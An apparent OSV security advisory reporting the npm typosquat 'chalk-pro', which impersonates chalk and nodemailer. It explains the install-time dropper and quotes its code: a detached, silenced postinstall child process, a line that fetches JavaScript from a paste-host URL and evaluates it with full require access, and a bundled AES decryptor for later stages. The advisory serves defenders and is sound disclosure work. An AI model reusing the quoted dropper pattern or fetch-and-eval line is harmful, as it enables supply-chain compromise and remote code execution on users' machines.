OSV-MAL-2026-5711

Malicious code in chalk-pro (npm)

--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce) Package is published as 'chalk-pro' (homepage chalk-pro.com) but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both chalk and nodemailer, with 'Andris Reinman' (the real nodemailer author) listed as author. The package.json postinstall hook runs `node lib/utils/index.js`, which uses `child_process.spawn(process.execPath, [filePath], { detached: true, stdio: ['ignore','ignore','ignore'] })` followed by `child.unref()` to launch `lib/utils/smtp-connection/index.js` as a detached, fully-silenced child so `npm install` returns immediately while the dropper continues in the background. The dropper executes `require('axios').get('https://www.jsonkeeper.com/b/TOAAK').then(r => new Function('require', r.data.cookie)(require))` — fetching attacker-controlled JavaScript from a mutable paste host and evaluating it with `new Function` at install time, with full access to `require`. A second file (`lib/utils/smtp-connection/parse.js`) provides AES-256-CBC decryption with a hardcoded key and IV, positioned to decrypt follow-up stages delivered as hex. This is a classic install-time dropper: typosquat lure + detached/silenced postinstall + remote eval from a mutable third-party paste + bundled second-stage decryptor.